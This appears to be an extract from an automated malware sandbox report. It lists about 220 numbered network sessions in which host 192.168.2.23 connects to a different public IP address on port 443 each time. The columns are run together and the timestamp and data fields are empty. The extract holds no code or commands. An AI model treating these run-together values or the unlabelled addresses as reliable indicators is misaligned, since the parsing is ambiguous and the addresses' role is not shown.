                                                15701192.168.2.2342758125.249.0.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15702192.168.2.235934290.18.6.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15703192.168.2.2335774212.206.11.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15704192.168.2.2335630210.88.67.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15705192.168.2.2352686177.149.244.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15706192.168.2.2357534173.49.80.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15707192.168.2.234996619.177.130.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15708192.168.2.2343280120.247.24.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15709192.168.2.235120874.135.173.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15710192.168.2.2338942128.74.216.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15711192.168.2.235507866.16.61.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15712192.168.2.235537090.0.4.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15713192.168.2.234787437.255.161.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15714192.168.2.2352424163.159.251.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15715192.168.2.233474496.95.212.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15716192.168.2.2335162120.32.37.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15717192.168.2.2355890113.222.205.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15718192.168.2.2346832204.57.225.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15719192.168.2.2341876173.252.55.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15720192.168.2.2352268181.135.171.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15721192.168.2.2343268198.203.14.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15722192.168.2.2347260162.75.156.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15723192.168.2.2352672220.149.53.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15724192.168.2.2338164177.72.124.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15725192.168.2.233685874.45.67.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15726192.168.2.234860294.48.64.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15727192.168.2.2353160206.102.9.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15728192.168.2.235929652.75.197.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15729192.168.2.2341286184.120.133.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15730192.168.2.2358460107.50.94.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15731192.168.2.234372266.135.22.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15732192.168.2.23336828.245.55.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15733192.168.2.2353566117.198.121.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15734192.168.2.235061472.228.182.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15735192.168.2.235973647.14.180.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15736192.168.2.2359444119.200.28.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15737192.168.2.2333606106.212.70.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15738192.168.2.2349834117.165.56.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15739192.168.2.234582877.73.53.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15740192.168.2.233445813.195.252.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15741192.168.2.2349080200.139.106.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15742192.168.2.2346150113.63.13.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15743192.168.2.2349744202.221.8.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15744192.168.2.233913458.109.253.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15745192.168.2.2337658117.122.128.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15746192.168.2.2350912125.70.189.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15747192.168.2.233575096.24.126.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15748192.168.2.2336824146.24.247.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15749192.168.2.2339988201.247.41.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15750192.168.2.233753097.249.42.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15751192.168.2.2347708158.165.35.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15752192.168.2.2344184152.55.97.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15753192.168.2.234318025.84.19.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15754192.168.2.235716673.112.107.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15755192.168.2.2338476160.25.179.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15756192.168.2.2347124171.157.253.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15757192.168.2.2341414213.252.207.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15758192.168.2.235005471.62.31.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15759192.168.2.234988660.214.115.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15760192.168.2.2342342106.12.66.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15761192.168.2.234596624.165.91.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15762192.168.2.234086436.190.38.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15763192.168.2.236084486.122.108.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15764192.168.2.2353256122.190.244.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15765192.168.2.2360968184.30.145.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15766192.168.2.235794831.32.202.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15767192.168.2.2338326115.86.147.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15768192.168.2.2347254187.182.177.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15769192.168.2.233408843.109.43.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15770192.168.2.2339596151.235.47.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15771192.168.2.235674883.37.43.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15772192.168.2.234853023.101.219.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15773192.168.2.2333526211.20.133.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15774192.168.2.2352300189.74.20.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15775192.168.2.2353952109.133.40.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15776192.168.2.233647843.249.180.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15777192.168.2.2357304221.235.137.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15778192.168.2.2355988114.63.101.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15779192.168.2.2344048220.9.132.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15780192.168.2.2339726143.189.81.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15781192.168.2.2338752182.77.106.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15782192.168.2.2338174119.3.157.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15783192.168.2.2355088141.249.217.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15784192.168.2.2350658192.138.147.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15785192.168.2.235978447.134.106.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15786192.168.2.235929689.226.166.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15787192.168.2.235652272.187.13.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15788192.168.2.234174258.174.23.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15789192.168.2.2356752104.242.13.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15790192.168.2.2356596178.132.6.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15791192.168.2.2342252138.21.93.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15792192.168.2.2336870119.198.74.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15793192.168.2.235111458.224.200.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15794192.168.2.234955895.222.105.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15795192.168.2.2343128212.190.132.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15796192.168.2.2344508174.6.255.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15797192.168.2.2337806112.62.125.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15798192.168.2.2360594209.216.64.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15799192.168.2.2355974204.229.31.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15800192.168.2.235025214.27.149.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15801192.168.2.2349142216.166.131.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15802192.168.2.2349532109.186.48.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15803192.168.2.2360120112.87.206.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15804192.168.2.234311041.128.68.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15805192.168.2.234625627.97.172.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15806192.168.2.235021696.196.114.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15807192.168.2.233856444.212.118.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15808192.168.2.2341656222.175.183.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15809192.168.2.2339036150.40.111.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15810192.168.2.2341200121.24.154.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15811192.168.2.2360394134.107.55.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15812192.168.2.235029092.69.120.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15813192.168.2.2336422179.254.101.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15814192.168.2.233295487.139.206.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15815192.168.2.235440680.33.152.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15816192.168.2.2356210147.154.169.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15817192.168.2.2334976196.236.188.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15818192.168.2.2353892184.62.196.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15819192.168.2.233668442.160.214.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15820192.168.2.2360186213.223.224.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15821192.168.2.2348040178.101.142.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15822192.168.2.2347686143.239.1.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15823192.168.2.2343962108.142.69.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15824192.168.2.2351006182.225.255.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15825192.168.2.2348928171.245.224.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15826192.168.2.234610458.143.7.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15827192.168.2.2351220176.16.247.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15828192.168.2.2356454137.116.18.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15829192.168.2.2356396192.144.73.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15830192.168.2.2353070103.91.120.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15831192.168.2.2359538151.93.150.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15832192.168.2.2352886170.159.236.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15833192.168.2.235891620.75.109.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15834192.168.2.235716690.212.67.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15835192.168.2.234536899.230.186.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15836192.168.2.234870486.7.175.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15837192.168.2.234850840.29.4.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15838192.168.2.2348852105.228.201.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15839192.168.2.234019883.128.250.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15840192.168.2.2340738187.68.176.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15841192.168.2.233364837.55.97.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15842192.168.2.23422805.238.251.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15843192.168.2.2350456194.226.198.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15844192.168.2.233889243.167.54.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15845192.168.2.234659070.6.207.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15846192.168.2.2348240122.32.155.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15847192.168.2.235020842.27.48.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15848192.168.2.2337510149.9.185.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15849192.168.2.2342010182.176.242.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15850192.168.2.235653231.185.59.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15851192.168.2.2349410191.142.93.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15852192.168.2.2339740129.89.111.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15853192.168.2.2350370205.207.89.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15854192.168.2.2334768209.113.36.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15855192.168.2.2339606128.211.30.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15856192.168.2.2353752131.250.199.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15857192.168.2.235428219.84.141.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15858192.168.2.233964214.204.53.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15859192.168.2.235276640.28.149.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15860192.168.2.2343942142.49.20.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15861192.168.2.235255491.54.80.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15862192.168.2.2337168209.179.54.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15863192.168.2.234840850.63.185.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15864192.168.2.2339900193.21.2.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15865192.168.2.2338474174.22.123.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15866192.168.2.234859875.30.3.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15867192.168.2.2355544148.68.145.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15868192.168.2.2344178209.86.123.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15869192.168.2.2349878149.124.221.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15870192.168.2.236028094.255.184.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15871192.168.2.2350690138.79.198.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15872192.168.2.2353034137.25.246.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15873192.168.2.23366482.93.84.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15874192.168.2.2338828140.66.3.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15875192.168.2.2358854205.95.251.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15876192.168.2.235653012.214.86.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15877192.168.2.235067287.224.5.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15878192.168.2.2348112191.47.93.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15879192.168.2.2344868143.239.133.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15880192.168.2.2337060128.192.241.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15881192.168.2.234530618.58.196.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15882192.168.2.2353452132.107.159.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15883192.168.2.2338792212.157.83.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15884192.168.2.235344238.227.72.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15885192.168.2.234291065.88.206.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15886192.168.2.2358440107.56.173.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15887192.168.2.2341158154.235.91.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15888192.168.2.233999260.56.187.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15889192.168.2.2353738108.98.252.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15890192.168.2.236097057.185.82.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15891192.168.2.2346940192.5.39.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15892192.168.2.235632087.20.197.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15893192.168.2.2339464131.208.126.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15894192.168.2.2353842138.239.16.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15895192.168.2.2335182190.161.191.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15896192.168.2.235568253.222.252.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15897192.168.2.2341572111.43.208.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15898192.168.2.2336012199.41.133.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15899192.168.2.2343506163.162.45.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15900192.168.2.235077672.99.215.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15901192.168.2.2359380185.170.238.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15902192.168.2.234828241.36.81.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15903192.168.2.236034091.126.209.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15904192.168.2.2349630205.88.232.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15905192.168.2.2334252187.18.79.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15906192.168.2.2344378187.155.178.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15907192.168.2.2353150118.217.85.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15908192.168.2.234347845.0.168.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15909192.168.2.235733025.190.163.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15910192.168.2.2344026183.56.155.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15911192.168.2.235876495.14.20.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15912192.168.2.2356724113.112.168.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15913192.168.2.234471093.0.60.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15914192.168.2.234262265.102.240.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15915192.168.2.2356614195.157.37.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15916192.168.2.235794612.119.98.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15917192.168.2.234711088.89.181.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15918192.168.2.23441168.45.198.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15919192.168.2.234569220.137.32.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15920192.168.2.235418887.251.208.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15921192.168.2.2341478170.189.4.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15922192.168.2.23350144.125.69.0443
                                                TimestampBytes transferredDirectionData


